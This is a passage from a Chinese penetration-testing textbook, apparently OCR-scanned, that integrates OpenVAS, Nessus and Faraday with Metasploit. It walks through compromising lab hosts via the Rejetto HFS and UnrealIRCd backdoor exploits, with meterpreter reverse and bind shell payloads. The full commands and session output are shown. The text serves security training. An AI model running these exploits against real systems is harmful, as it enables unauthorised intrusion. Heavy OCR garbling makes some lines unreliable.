这 个 报告 可 以 下 载 ,也 可 以 通过 在 openvas_report_import 命 令 后 面 加 上 报告 ID 和 格式 ID 
导入 到 数据 库 中 ， 如 下 图 所 示 。 


msf > openvas report import 0 13 
[*] Importing report to database. 


也 可 以 使 用 openvas_format_1ist 命 令 来 查看 所 有 的 格式 ID， 过 程 如 下 图 所 示 。 


msf > openvas format list 

[ OpenVAS list of report formats 

ID Name Extension Summary 

0 Anonymous XML xml Anonymous version of the raw XML report 
1 ARF xml Asset Reporting Format v1.0.0. 

2 CPE csv Common Product Enumeration CSV table. 

3 CSV Hosts csv CSV host summary. 

4 CSV Results csv CSV result list. 

5 HTML html Single page HTML report. 

6 ITG csv German "IT-Grundschutz-Kataloge" report. 
7 LaTeX tex LaTeX source file. 

8 NBE nbe Legacy OpenVAS report. 

9 PDF pdf Portable Document Format report. 

10 Topology SVG svg Network topology SVG image. 

11 TXT txt Plain text report. 

12 Verinice ISM vna Greenbone Verinice ISM Report, v1.1.10. 
13 XML xml Raw XML report. 
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将 报告 成 功 导入 数据 库 之 后 , 就 可 以 使 用 vulns 命 令 查看 MSF 中 的 漏洞 数据 库 , 如 下 图 所 示 。 


msf > vulns 

[*] Time: 2016-06-19 16:28:50 UTC Vuln: host-192.168.10.104 name=MS15-034 HTTP.sys Remote 
tion Vulnerability (remote check) refs-zCVE-2015-1635 

[*] Time: 2016-06-19 16:28:50 UTC Vuln: host-192.168.10.104 namezPHP-CGI-based setups vuln 
Iwhen parsing query string parameters from php files. refs-CVE-2012-1823,CVE-2012-2311,CVE- 
CVE-2012-2335,BID-53388 

[*] Time: 2016-06-19 16:28:50 UTC Vuln: host-192.168.10.104 name-ICMP Timestamp Detection 


FEA BS d d] AR E Z6 dr) Y AGEE P o RATA n] DABI zt 10 E 28 U; [8] 9392 m O RKA 2€ 
Greenbone 助 手 ， 对 漏洞 数量 进行 交替 确认 ， 并 深入 了 解 这 些 漏洞 的 细节 ， 如 下 图 所 示 。 


fà https://127.0.0.1:9392/omp?cmd=get_report&report_id=55248290-14b5-400cY Œ B Y Google a * 县 519 E 


pst Visited v Wlorensive Security S Kali Linux ^. Kali Docs \ Kali Tools Kexpioit-DB Wa Aircrack-ng 


~ Report: Results WØ 1 - 44 of 54 (total: 54) I OE PF p 

Fiter: |sort-reverse=severity result- hosts. only-1 min-cvss-base- min-qod-70 || 9 J (à | |] aas 
MS15-034 HTTP.sys Remote Code Execution Vulnerability | 10.0 (High) | ca 
(rere heck) aJ 95% 192.168.10.104 80/tcp ES) NJ 
PHP-CGI-based setups vulnerability when parsing query BNCIIDNNNMS an] 
string parameters from php files. [| 9596 192.168.10.104 80/tcp SEJ 
phpinfo() output accessible o EL 8096 192.168.10.104 80/tcp EES 
php Multiple Vulnerabilities -01 March16 (Windows) u 8096 192.168.10.104 80/tcp sfr. 
php 'serialize function call' Function Type Confusion 75 High) | 

Vulnerability March16 (Windows) [9| 80% 192.168.10.104 80/tcp 时 出 
php 'phar fix filepath' Function Stack Buffer Overflow 3 
Vulnerability March16 (Windows) id n 80% 192.168.10.104 80/tcp 时 出 
php Multiple Vulnerabilities -01 Aprill 6 (Windows) a| 80% 192.168.10.104 80/tcp EE 
HTTP File Server Remote Command Execution 

Vulnerability-01 Jan16 [9| N 80% 192.168.10.104 8080/tcp 时 出 
HTTP File Server Remote Command Execution 

Vulnerability-02 Jan16 G EEC 8096 192.168.10.104 8080/tcp SRI 


我 们 已 经 在 目标 主机 上 发 现 了 多 个 影响 很 大 的 漏洞 , 现在 正 是 对 威胁 区 域 进行 建 模 、 确 定 针 
对 目标 系统 高 危 漏洞 的 最 好 时 机 。 


6.1.4 对 威胁 区 域 进行 建 模 


在 进行 渗透 测试 的 时 候 最 先 考 虑 的 就 是 对 威胁 区 域 进行 建 模 。 这 个 阶段 最 重要 的 就 是 网 络 中 
的 关键 区 域 , 这 些 区 域 是 至 关 重 要 的 ,同时 它们 与 其 他 区 域 也 建立 着 连接 。 一 个 网 络 和 系统 是 否 
脆弱 取决 于 威胁 区 域 。 我们 可 能 找到 了 很 多 目标 网 络 或 者 系统 的 漏洞 , 但 是 这 些 漏洞 会 对 关键 区 
域 造成 什么 样 的 影响 才 是 我 们 最 关心 的 问题 。 这 个 阶段 的 研究 重点 是 如 何 消除 那些 对 组 织 资 产 产 
生 最 高 威胁 的 漏洞 。 对 威胁 区 域 进行 建 模 将 会 帮助 我 们 对 目标 漏洞 进行 正确 的 设置 。 不 过 应 客户 
要 求 ， 可 以 跳 过 这 个 阶段 。 


分 析 目 标 可 能 产生 的 影响 , 并 将 这 些 漏洞 与 可 能 产生 的 最 大 影响 进行 标记 是 十 分 必要 的 。 此 
外 ， 当 我 们 面 对 的 渗透 目标 是 一 个 大 型 网 络 的 关键 区 域 时 ， 威 胁 建 模 也 是 十 分 重要 的 。 
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根据 OpenVAS 提 供 的 扫描 结果 ， 可 以 看 出 目标 计算 机 上 存在 MS15-034 漏 洞 ， 但 是 对 这 个 漏 
洞 的 渗透 测试 可 能 会 引起 目标 计算 机 蓝屏 宕 机 (Blue Screen of Death，BSOD )。 在 大 多 数 渗透 测 
试 中 ， 都 应 尽量 避免 使 用 DoS 攻 击 方式 ， 除 非 我 们 事先 征求 客户 同意 。 因 此 ， 跳 过 这 个 漏洞 ， 转 
而 去 选择 一 个 靠得住 的 漏洞 HTTP 文 件 服务 器 远程 代码 执行 漏洞 ( HTTP File Server Remote 
Command Execution Vulnerability )。 通 过 在 OpenVAS 的 Web 界 面 浏览 这 个 漏洞 的 细节 ， 可 以 看 到 
这 个 漏洞 对 应 的 编号 为 CVE 2014-6287。 接 着 在 Metasploit 中 查找 这 个 漏洞 对 应 的 渗透 模块 ， 很 快 
便 会 找到 exploit/windows/http/rejetto_hfs_exec 模 块 ， 查找 的 过 程 如 下 图 所 示 。 


msf > search cve:2014-6287 


Matching Modules 


Name Disclosure Date Rank Descriptio 


exploit/windows/http/rejetto hfs exec 2014-09-11 excellent Rejetto Ht 
tpFileServer Remote Command Execution 


6.1.5 ”获取 目标 的 控制 权限 
通过 漏洞 对 目标 进行 渗透 ， 获 取 对 目标 的 完全 控制 权限 ， 如 下 图 所 示 。 


msf > use exploit/windows/http/rejetto hfs exec 

msf exploit(rejetto hfs exec) > set RHOST 192.168.10.104 

RHOST => 192.168.10.104 

msf exploit(rejetto hfs exec) » set RPORT 8080 

RPORT -» 8080 

msf exploit(rejetto hfs exec) » set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 

msf exploit(rejetto hfs exec) » set LHOST 192.168.10.107 

LHOST => 192.168.10.107 

msf exploit(rejetto hfs exec) » exploit 


[*] Started reverse TCP handler on 192.168.10.107:4444 
[*] Using URL: http://0.0.0.0:8080/VGuj cDb9h 
[*] Local IP: http://192.168.10.107:8080/VGuj cDb9h 
[*] Server started. 
[*] Sending a malicious request to / 
[*] 192.168.10.104 rejetto hfs exec - 192.168.10.104:8080 - Payload request re 
ceived: /VGujcDb9h 
[*] Sending stage (957487 bytes) to 192.168.10.104 
[*] Meterpreter session 1 opened (192.168.10.107:4444 -» 192.168.10.104:49178) a 
t 2016-06-21 21:21:23 40530 
Tried to delete *5TEMP*NbqZFHFaUu.vbs, unknown result 
[*] Server stopped. 


meterpreter > M 


我 们 现在 已 经 成 功 入 侵 了 目标 系统 。 现 在 再 继续 查找 该 系统 邻近 的 计算 机 。 据 我 们 所 知 ， 这 
里 应 该 有 不 止 一 人 台 计 算 机 ， 虽然 它们 的 IP 地 址 还 不 得 而 知 


找 出 这 些 计 算 机 的 一 种 方法 就 是 查看 当前 已 经 成 功 渗透 的 计算 机 的 ARP 表 。 在 Meterpreter 命 
令 行 输入 arp 命 令 ， 过 程 如 下 图 所 示 。 
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meterpreter > zig 


Computer WIN-3KOU2TIJA4EO 

os : Windows 2012 R2 (Build 9600). 
Architecture : x64 (Current Process is WOW64) 
System Language : en US 

Domain : WORKGROUP 

Logged On Users : 1 

Meterpreter : x86/win32 


meterpreter > arp 


ARP cache 
IP address MAC address Interface 
192.168.10.107 08:00:27:55:fc:fa 12 
192.168.10.108 08:00:27:9b:25:a1 12 
224.0.0.22 01:00:5e:00:00:16 12 
224.0.0.22 01:00:5e:00:00:16 15 


从 目标 主机 执行 arp 命 令 的 结果 可 知 ， 附 近 只 有 一 个 计算 机 ， 这 个 计算 机 的 耳 地 址 为 
192.168.10.108。 其 实 完全 可 以 使 用 Nmap 来 完成 这 项 工作 ， 但 是 为 了 实践 更 多 的 技术 ， 我 们 
最 好 练习 一 下 arp 命 令 的 使 用 方法 。 考 虑 到 当前 案例 是 一 个 内 部 网 络 ， 而 你 可 能 没有 获得 访问 它 
的 权限 ， 或 者 可 能 不 知道 它 的 卫 地 址 范围 。 在 这 种 情况 下 ， 使 用 arp 可 以 和 息 。 


OpenVAS 与 Metasploit 的 配合 天 衣 无 颖 .下 一 节 中 将 使 用 Nessus 对 刚 找到 的 计算 机 进行 一 次 漏 
洞 扫 描 。 


如 果 需 要 在 Kali Linux 中 安装 Nessus ， 请 访问 http://www.hackandtinker.net/ 
213/1/16/how-to-install-setup-and-use-nessus-on-kali/ 


使 用 Nessus 进 行 漏洞 扫描 


Nessus 是 tenable 推 出 的 一 款 付费 工具 ， 被 公认 为 最 优秀 的 企业 版 漏洞 扫描 工具 之 一 。Nessus 
不 仅 可 以 执行 漏洞 扫描 ， 还 可 以 六 TARER, PCI DSS 检 查 ， 其 至 支持 多 种 架构 上 超过 一 百 
种 合 规 性 。Nessus 的 工作 界面 十 分 友好 。 与 OpenVAS 和 其 他 漏洞 扫描 工具 相 比 ，Nessu 也 更 加 稳 
它 虽然 价格 不 菲 ， 但 是 绝对 物 超 所 值 ， 是 一 个 被 绝 大 多 数组 织 所 推崇 的 工具 。 


现在 在 Metasploit 中 载 人 Nessus 插 件 ， 如 下 图 所 示 。 


msf > load nessus 

[*] Nessus Bridge for Metasploit 

[*] Type for a command listing 

[*] Successfully loaded plugin: Nessus 

msf > nessus connect nipun:18101988(127.0.0.1:8834 


[*] Connecting to https://127.0.0.1:8834/ as nipun 
[*] User nipun authenticated successfully. 

msf » nessus policy list 

Policy ID Name Policy UUID 


48 Basic 731a8e52-3ea6-a291-ec0a-d2ff0619c19d7bd788d6be818b65 
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载 人 Nessus 插 件 的 方法 与 载 人 OpenVAS 插 件 的 方法 几乎 一 样 , 都 是 使 用 1oad 命 令 。 接 下 来 如 
上 图 所 示 , 在 nessus_connect 命 令 后 添加 用 户 的 登录 凭证 和 服务 器 的 IP 和 端口 ， 从 而 连接 到 本 
地 的 Nessus 服 务 器 。 通 过 使 用 nessus_policy_list 命 令 , 可 以 列 出 当前 Nessus 中 所 有 配置 好 的 
策略 一 一 里 面 已 经 有 了 一 个 名 为 Basic 的 策略 。 注意 看 一 下 UUID, 在 创建 扫描 任务 时 会 需要 这 个 
值 。 按 照 下 图 ， 创建 一 个 新 的 任务 。 


msf > nessus scan new 731a8e52-3ea6-a291-ec8a-d2ff8619c19d7bd788d6be818b 
65 108-Scan "Newly Found 108 System Basic Scan" 192.168.10.108 

[*] Creating scan from policy number 731a8e52-3ea6-a291-ec0a-d2ff0619c19 
d7bd788d6be818b65, called 108-Scan - Newly Found 108 System Basic Scan a 
nd scanning 192.168.10.108 

[*] New scan added 

[*] Use nessus scan launch 50 to launch the scan 

Scan ID Scanner ID Policy ID Targets Owner 


50 1 49 192.168.10.108 nipun 


要 创建 扫描 任务 ， 可 以 如 上 图 所 示 使 用 nessus_scan_new 命 令 加 上 策略 的 UUID、 任务 的 名 
字 、 描 述 和 IP 地 址 。 由 上 图 可 知 ， 这 个 任务 已 经 成 功 建立 ,而 且 系 统 为 这 个 任务 分 配 了 50 作 为 它 
的 Scan ID。 下 一 步 使 用 nessus_scan_launch 来 启动 这 个 任务 ， 如 下 图 所 示 。 


msf > nessus scan launch 50 

Scan ID 50 successfully launched. The Scan UUID is 7e6dc909-9046-d161-31de-50b6695c9aba48b24218075af6fc 
msf » nessus scan details 50 info 
Status Policy Scan Name Scan Targets Scan Start Time Scan End Time 


running Basic Network Scan 108-Scan  192.168.10.108 1466510183 


在 扫描 过 程 中 可 以 使 用 nessus_scan_details 命 令 ， 以 Scan ID 和 ;info 作 为 参数 来 查看 扫 
描 的 完成 状态 。 


任务 完成 之 后 , fii Nnessus report, hostsfi ? IIRA ERE FOBUSE TEE 4 f. , 如 下 
图 所 示 。 


msf > nessus report hosts 50 


Host ID Hostname * of Critical Findings % of High Findings % of Medium Findings % of Low Findings 


2 192.168.10.108 10 4 17 5 


在 这 次 扫描 中 ， 我 们 发 现 了 10 个 极度 危险 、4 个 高 度 危险 、17 个 中 度 危 险 和 5 个 低级 危险 。 
下 面 使 用 命令 nessus_report_vulns 来 查看 在 这 次 扫描 中 发 现 的 指定 类 型 漏洞 的 数量 ， 如 下 
图 所 示 。 


6.1 使 用 Metasploit 集成 的 服务 完成 一 次 渗透 测试 175 


msf > nessus report vulns 50 

Plugin ID Plugin Name Plugin Family Vulnerability Count 
10028 DNS Server BIND version Directive Remote Version Detection DNS 1 
10056 /doc Directory Browsable CGI abuses 1 
10079 Anonymous FTP Enabled FTP 1 
10092 FTP Server Detection Service detection 2 
10107 HTTP Server Type and Version Web Servers 2 
10114 ICMP Timestamp Request Remote Date Disclosure General 1 
10150 Windows NetBIOS / SMB Remote Host Information Disclosure Windows 1 
10203 rexecd Service Detection Service detection 1 
10205 rlogin Service Detection Service detection 1 
10223 RPC portmapper Service Detection RPC 1 
10245 rsh Service Detection Service detection 1 
10263 SMTP Server Detection Service detection 1 
10267 SSH Server Type and Version Information Service detection 1 
10281 Telnet Server Detection Service detection 1 
10287 Traceroute Information General 1 
10342 VNC Software Detection Service detection 1 
10380 rsh Unauthenticated Access (via finger Information) Gain a shell remotely 1 
10394 Microsoft Windows SMB Log In Possible Windows T 
10397 Microsoft Windows SMB LanMan Pipe Server Listing Disclosure Windows 1. 
10407 X Server Detection Service detection 1 
10437 NFS Share Export List RPC 1 
10719 MySQL Server Detection Databases 1 
10785 Microsoft Windows SMB NativeLanManager Remote System Information Disclosure Windows 1 
10863 SSL Certificate Information General 1 
10881 SSH Protocol Versions Supported General 1 
11002 DNS Server Detection DNS 2 
11011 Microsoft Windows SMB Service Detection Windows 2 
11111 RPC Services Enumeration Service detection 1e 
11153 Service Detection (HELP Request) Service detection 1 
11154 Unknown Service Detection: Banner Retrieval Service detection 1 
11156 IRC Daemon Version Detection Service detection 1 
11213 HTTP TRACE / TRACK Methods Allowed Web Servers 1 
11219 Nessus SYN scanner Port scanners 25 
11356 NFS Exported Share Information Disclosure RPC 1 
11422 Web Server Unconfigured - Default Install Page Present Web Servers 1 
11424 WebDAV Detection Web Servers 1 
11819 TFTP Daemon Detection Service detection 1 


使 用 nessus_dqb_import 命 令 和 Scan ID 将 Nessus 中 的 扫描 结果 都 导入 到 Metasploit 的 数据 库 
中 ， 如 下 图 所 示 。 


msf > nessus db import 50 

[*] Exporting scan ID 50 is Nessus format... 

The export file ID for scan ID 50 is 1544580296 
Checking export status... 

The status of scan ID 50 export is ready 
Importing scan results to the database... 
Importing data of 192.168.10.108 

Done 

msf > I 


除非 创建 一 个 新 的 工作 区 ， 否则 现在 的 导入 操作 会 覆盖 之 前 OpenVAS 导 入 的 
数据 。 


在 Metasploit 中 输入 hosts 和 vulns 命 令 来 检查 导入 是 否 成 功 ， 如 下 图 所 示 。 
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msf > hosts 


address mac name os name os flavor o 
s sp purpose info comments 


192.168.10.108 08:00:27:9b:25:a1 192.168.10.108 Linux 2 
«6 server 


msf > vulns 

*] Time: 2016-06-21 12:07:43 UTC Vuln: host-192.168.10.108 name-RPC Ser 
vices Enumeration refs-NSS-11111 

*] Time: 2016-06-21 12:07:43 UTC Vuln: host-192.168.10.108 name-RPC Ser 
vices Enumeration refs-NSS-11111 

*] Time: 2016-06-21 12:07:43 UTC Vuln: host-192.168.10.108 name-RPC Ser 
vices Enumeration refs-NSS-11111 

*] Time: 2016-06-21 12:07:43 UTC Vuln: host-192.168.10.108 name-RPC Ser 
vices Enumeration refs-NSS-11111 

*] Time: 2016-06-21 12:07:43 UTC Vuln: host-192.168.10.108 name-Unknown 
Service Detection: Banner Retrieval refs-NSS-11154 

*] Time: 2016-06-21 12:07:43 UTC Vuln: host-192.168.10.108 name-Nessus 
SYN scanner refs-NSS-11219 

*] Time: 2016-06-21 12:07:43 UTC Vuln: host-192.168.10.108 name-Apache 
Tomcat Manager Common Administrative Credentials refs-CVE-2009-3099,CVE- 
2009-3548,CVE-2010-0557,CVE-2010-4094,BID-36253,BID-36954,BID-37086,BID- 
38084,BID-44172,0SVDB- 57898, OSVDB- 60176 , OSVDB -60317 , OSVDB- 62118 , OSVDB-69 
008,EDB-ID-18619,CWE-255,MSF-Apache Tomcat Manager Authenticated Upload 
Code Execution,NSS-34970 

*] Time: 2016-06-21 12:07:43 UTC Vuln: host-192.168.10.108 name-Unsuppo 
rted Web Server Detection refs-NSS-34460 

*] Time: 2016-06-21 12:07:43 UTC Vuln: host-192.168.10.108 name-Apache 
Tomcat Default Error Page Version Detection refs-NSS-39446 

*] Time: 2016-06-21 12:07:43 UTC Vuln: host-192.168.10.108 name-Web Ser 


可 以 看 到 ， 现 在 的 Metasploit 数 据 库 中 已 经 添加 了 Nessus 的 扫描 结果 。 现 在 使 用 services 命 
令 来 查找 在 目标 上 运行 的 所 有 服务 ， 如 下 图 所 示 。 


sf > services 


Services 

host port proto name state info 
192.168.10.108 21 tcp ftp open 
192.168.10.108 22 tcp ssh open 
192.168.10.108 23 tcp telnet open 
192.168.10.108 25 tcp smtp open 
192.168.10.108 53 tcp dns open 
192.168.10.108 53 udp dns open 
192.168.10.108 69 udp tftpd open 
192.168.10.108 80 tcp Www open 


192.168.16.168 111 tcp rpc-portmapper open 
192.168.10.108 111 udp rpc-portmapper open 


192.168.10.108 139 tcp smb open 
192.168.10.108 445 tcp cifs open 
192.168.10.108 512 tcp rexecd open 
192.168.10.108 513 tcp rlogin open 
192.168.10.108 514 tcp rsh open 
192.168.10.108 1099 tcp rmi registry open 
192.168.10.108 1524 tcp wild shell open 
192.168.10.108 2049 tcp rpc-nfs open 
192.168.10.108 2049 udp rpc-nfs open 
192.168.10.108 2121 tcp ftp open 
192.168.10.108 3306 tcp mysql open 
192.168.10.108 3632 tcp open 
192.168.10.108 5432 tcp postgresql open 
192.168.10.108 5900 tcp vnc open 
192.168.10.108 6000 tcp x11 open 
192.168.10.108 6667 tcp irc open 
192.168.10.108 $8009 tcp ajpi13 open 
192.168.10.108 $8180 tcp Www open 
192.168.10.108 8787 tcp open 
192.168.10.108 36728 tcp rpc-mountd open 
192.168.10.108 38747 tcp rpc-status open 
192.168.10.108 346318 udp rpc-mountd open 


192.168.10.108 51634 tcp rpc-nlockmgr open 
192.168.10.108 55045 udp rpc-nlockmgr open 
192.168.10.108 58381 udp rpc-status open 
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在 目标 系统 上 运行 着 大 量 服 务 。 来 找 一 个 可 以 渗透 , 但 渗透 过 程 不 会 对 系统 的 可 用 性 产生 重 
影响 的 服务 ， 如 下 图 所 示 。 


msf > search cve:2010-2075 


Name Disclosure Date Rank Description 


exploit/unix/irc/unreal ircd 3281 backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution 


msf > use exploit/unix/irc/unreal ircd 3281 backdoor 
msf exploit(unreal ircd 3281 backdoor) > show payloads 


Compatible Payloads 


Name Disclosure Date Rank Description 

cmd/unix/bind perl normal Unix Command Shell, Bind TCP (via Perl) 
cmd/unix/bind perl ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6 
cmd/unix/bind ruby normal Unix Command Shell, Bind TCP (via Ruby) 
cmd/unix/bind ruby ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6 
cmd/unix/generic normal Unix Command, Generic Command Execution 
cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) 
cmd/unix/reverse perl normal Unix Command Shell, Reverse TCP (via Perl) 
cmd/unix/reverse perl ssl normal Unix Command Shell, Reverse TCP SSL (via perl) 
cmd/unix/reverse ruby normal Unix Command Shell, Reverse TCP (via Ruby) 
cmd/unix/reverse ruby ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby) 
cmd/unix/reverse ssl double telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) 


根据 vulns 命 令 的 执行 结果 ， 我 们 选择 CVE 2010-2075 漏 洞 一 UnrealIRCD 3.2.8.1 后 门 命令 
执行 漏洞 。 为 了 实现 对 这 个 漏洞 的 渗透 ， 我 们 将 要 使 用 Metasploit 中 的 exploit/unix/irc/ 
unreal_ircd_3281_pbackdoor 模 块 。 从 show payloads 命 令 显 示 的 结果 来 看 ， 这 个 模块 并 没 
有 Meterpreter 类 型 的 攻击 载荷 ， 因 此 需要 使 用 一 个 bind shell 类 型 的 攻击 载荷 ， 如 下 图 所 示 。 


msf exploit(unreal ircd 3281 backdoor) > set payload cmd/unix/bind perl 
payload -» cmd/unix/bind perl 


攻击 载荷 cmd/unix/bind_per1 将 会 提供 一 个 目标 系统 的 shell 控 制 权 限 ， 可 以 通过 使 用 
wget 命 令 将 一 个 可 执行 的 攻击 载荷 上 传 到 目标 主机 并 执行 它 ， 从 而 将 shell 升 级 为 Metepreter。 在 
一 个 新 的 渗透 模块 handler 中 实现 全 部 的 功能 。 


按照 如 下 图 所 示 的 过 程 来 渗透 目标 系统 。 


Imsf exploit(unreal ircd 3281 backdoor) > set RHOST 192.168.10.108 
RHOST => 192.168.10.108 
msf exploit(unreal_ircd_3281_backdoor) > exploit 


[*] Started bind handler 
[*] Connected to 192.168.10.108:6667... 
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... 
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead 
[*] Sending backdoor command... 
[*] Command shell session 1 opened (192.168.10.107:60083 -» 192.168.10.108:4444) at 2016-06-21 18:03:49 40530 


ls 

Donation 

LICENSE 

aliases 
badwords . channel.conf 
badwords .message.conf 
badwords .quit.conf 
curl-ca-bundle.crt 
dccallow. conf 

doc 
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现在 便 已 获得 目标 主机 的 shell 控 制 权 限 。 建 议 你 对 所 有 不 会 影响 生产 系统 和 导致 目标 可 
用 性 失败 的 漏洞 进行 测试 。 男 外 ， 如 果 是 在 测试 环境 中 工作 的 话 ， 那 么 最 好 对 所 有 漏洞 都 进 
行 测试 。 


6.1.6 ”保持 控制 权限 和 掩盖 入 侵 痕 迹 

对 一 个 机 构 进行 灰 盒 测试 时 , 我 们 可 能 无 须 一 直 保持 对 目标 的 控制 权限 , 也 无 须 担心 人 侵 活 
动产 生 的 日 志 。 但 是 出 于 学 习 目 的 , 本 书 的 后 半 部 分 将 会 用 一 整 章 的 内 容 来 介绍 后 渗透 工作 ,其 
中 将 会 涵盖 攻击 性 安全 测试 的 全 部 策略 。 


6.1.7 ”使 用 Faraday 管理 渗透 测试 


Faraday 是 一 个 开源 协作 渗透 测试 和 漏洞 管理 平台 。 它 拥有 支持 实时 显示 的 仪表 面板 和 超过 
50 种 工具 ， 从 而 和 你 的 安全 工作 流 实现 无 颖 集成 。 它 还 允许 CISO (IT 安全 主管 ) 和 渗透 测试 工 
程 师 从 实时 评估 中 获取 系统 的 影响 和 风险 信息 。 另 外 ，Faraday 还 支持 多 用 户 在 同一 项 目 上 同时 
工作 。 我 大 力 推荐 这 个 工具 。 


qD 如 果 需 要 在 Kali Linux 上 安装 Faraday ， 请 访问 https://github.com/infobyte/ 
faraday/wiki。 


Faraday 工 具有 一 个 内 置 shell, 可 以 直接 用 来 进行 渗透 测试 。 这 个 工具 的 最 大 优势 在 于 它 可 以 
直接 在 shell 中 运行 各 种 测试 工具 ， 并 对 输出 数据 进行 收集 和 整理 。 此 外 ,将 使 用 目前 流行 的 其 他 
工具 生成 的 报告 导 和 人 到 Faraday 中 也 十 分 简单 。 现 在 就 使 用 ab_export 命 令 导 出 测试 结果 ， 过 程 
如 下 图 所 示 。 


> db export -f xml /root/Desktop/abc.xml 

] Starting export of workspace Netscan to /root/Desktop/abc.xml [ xml ]... 
] >> Starting export of report 

] >> Starting export of hosts 

] >> Starting export of events 

] >> Starting export of services 

] >> Starting export of web sites 

] >> Starting export of web pages 

] >> Starting export of web forms 

] >> Starting export of web vulns 

] »» Starting export of module details 

] >> Finished export of report 

] Š export of workspace Netscan to /root/Desktop/abc.xml [ xml ]... 
f > 


E———————————- 


我 们 轻而易举 地 就 将 测试 结果 从 数据 库 中 导出 了 。 然 后 启动 Faraday， 将 XML 报告 导入 ， 过 
程 如 下 图 所 示 。 
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Eile Shell Edit Workspace Tools View 


jj kESES ERES 


Shell-1 | 


L[rootÉmm:^ 


raday/reportvpentest/ 国 


zfaraday-dev]?)$ cp /root/Desktop/abc.xml /root/.fa 


; Perspective 


Hosts 


ig pentest 
General 


t 
ti 


- 


1 92.168.10.104 [v:2,n:1] 
&- 4192.168.10.108 [v:12,n:1] 

HAT 92.168.10.108 

E3(1099/tcp) rmi. registry [v:2] 

EX 11/tcp) rpc-portmapper [v:3] 
[3(111/udp) rpce-portmapper [v:2] 
EX1 39/tcp) smb [v:2] 

(1524/tcp) wild shell [v:3] 

(2049/tcp) rpc-nfs [v:4] 
[3(2049/udp) rpc-nfs [v:2] 


FTU ant Fes eT 


[INFO] 
[INFO] 
[INFO] - 
[INFO] 


- 2016-06-22 16:31:00,299 
- 2016-06-22 16:31:00,299 
2016-06-22 16:31:00,299 
- 2016-06-22 16:52:45,905 


- faraday - 
- faraday - 
- faraday - 
- faraday - 


Faraday ui is ready 


Screenshots taken 


Make sure you have couchdb up and running if you want visualizations 
If couchdb is up, point your browser to: [http://127.0.0.1:5984/reports/ design/reports/index.html] 


现在 只 需 将 这 个 XML 文件 复制 到 位 于 root.faraday/reportpentest 的 工作 区 


告 中 的 数据 添加 到 Faraday 中 了 。 


除了 可 以 手 


插件 。 


动 移动 外 ，Faraday 还 提供 


Plugin 


Dnsmap XML Output Plugin 
Dnsrecon XML Output Plugin 
Dnswalk XML Output Plugin 
Faraday Output Plugin 
Fierce Output Plugin 
Ftp 
Goohost XML Output Plugin 
Hydra XML Output Plugin 
Listurls XML Output Plugin 
Maltego MTGX Output Plugin 
Masscan Output Plugin 
Medusa Output Plugin 
Metagoofil XML Output Plugin mi 
Online Service Plugin 
Metasploit XML Output Plugin 
Nessus XML Output Plugin 
Netsparker XML Output Plugin 
Nexpose XML 2.0 Report Plugin 
Nexpose XML Output Plugin 
Nikto XML Output Plugin 
Nmap XML Output Plugin 
Onapsis X1 XML Output Plugin 


目录 中 ,就 可 以 将 报 


了 一 个 可 以 直接 从 Metasploit 数 据 库 中 获取 内 容 的 在 线 


Plugin Settings 


Name: [Metasploit Online Service Plugin 


Tool: [Metasploit 4.10.0 


Plugin: [0.0.2 


Value 
Enable 


|Database ^ |mst3 


Wordspace %% 
Server localhost 


User 
|Password —— — |EKO-1919755b 


7337 


rj 


OK Cancel 


如 果 需 要 实现 结果 的 可 视 化 ， 可 以 单 击 菜单 栏 上 的 条 形 图 图 标 。 


位 于 /root/.faraday/report 下 的 目录 pentest 就 是 Faraday 所 使 用 的 工作 区 的 名 字 。 
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单 击 条 形 图 图 标 之 后 ， 就 会 显示 如 下 图 所 示 的 工作 区 仪表 面板 。 


B Top Services © Top Hosts O Vulnerabilities € Services report © Workspace summarized report € 
- Q UNKNOWN DNS FTP HTTP HosTS NOTES SERVICES TOTAL VULNS 
AA 2 2 2 2 149 
Ld RPCMOUNTD — RPCNFS ^ RPC-NLOCKMGR RPC-PORTMAPP| VULNS 
Last Vulnerabilities © 
uii Ease of Vulnerabilities © 
Dato Target Soverty Name Web ^ rosoluton 
(ai  os222orsa  192.160.10.104 into PHP-CGH-based saupswnerabmywnenpars — X 1 0 0 0 148 
4:14PM Q ng query string parameters from pho flies. 
= CRITICAL Hion MED w NFO 
DC 06/22/2016 a — 192.168.10.104 Info. MS15-034 HTTP.sys Remote Code Execubon V — X L- J 
uinerabillty (remote check) 
> OS22/2016 2t  192.168.10.104 — Info ICMP Timestamp Dotoction x Workspaco's worth © 
4:14PM 
(3) $5,000.00 total 
06/22/2016 at — 192.168.10.104 — cmical Rejetto HitpFlleServer Remote Command Exec — X moderate 
4:14PM ution 
——"— APC Servcos Etumeraton x IL En EIS 
4:14PM 


现在 就 可 以 列 出 所 有 漏洞 、 生 成 执行 报告 、 修 改 漏洞 的 严重 程度 、 为 指定 漏洞 添加 描述 并 执 
行 其 他 各 种 操作 。 
如 果 想 查看 Faraday 的 使 用 演示 ， 请 访问 https:/github.conyinfobyte/faraday/ 


WwWlklyDemos。 


Faraday 还 提供 了 一 个 GTK 界 面 一 一 一 个 比 QT 界 面 好 看 许多 的 GUI 有 界面。 有关 
Q GTK 界 面 的 更 多 相关 信息 ， 请 访问 https://github.com/infobyte/faraday/wiki/Usage# 
gtk-gui。 


有 关 如 何 使 用 Metasploit 和 Faraday 协 同 工 作 的 更 多 信息 ， 请 访问 https://github. 
com/infobyte/faraday/wiki/Metasploit。 


6.1.8 手动 创建 报告 


现在 让 我 们 来 讨论 如 何 手动 创建 一 份 渗透 测试 报告 , 看 看 其 中 应 该 包括 哪些 内 容 , 这 些 内 容 
应 该 放 在 什么 位 置 ， 应 该 加 入 / 移 除 什么 ， 如 何 规范 化 报告 的 格式 ， 以 及 如 何 使 用 图 表 等 。 这 个 
渗透 测试 的 报告 将 会 被 很 多 人 阅读 ， 例 如 负责 人 、 管 理 员 、 高 层 决策 人 员 。 因 此 ， 必 须 将 所 有 资 
料 组 织 得 足够 好 ， 这 样 我 们 所 要 表达 的 想法 才能 被 这 些 人 正确 理解 。 


1. 报告 的 格式 
